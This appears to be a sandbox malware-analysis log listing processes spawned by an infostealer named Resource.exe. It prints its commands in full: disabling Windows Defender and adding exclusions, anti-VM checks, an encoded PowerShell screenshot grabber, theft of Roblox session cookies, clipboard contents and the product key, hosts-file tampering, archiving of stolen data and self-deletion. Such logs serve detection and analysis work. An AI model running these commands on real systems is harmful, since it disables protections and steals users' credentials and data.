Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\Resource.exe""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Users\user\Desktop\Resource.exe "C:\Users\user\Desktop\Resource.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\Resource.exe""	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\Resource.exe""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\Resource.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB5E2.tmp" "c:\Users\user\AppData\Local\Temp\erdw4v5g\CSCD6B8C8C98EAE4A66B46BEA9E417699A.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3

Source: C:\Users\user\Desktop\Resource.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
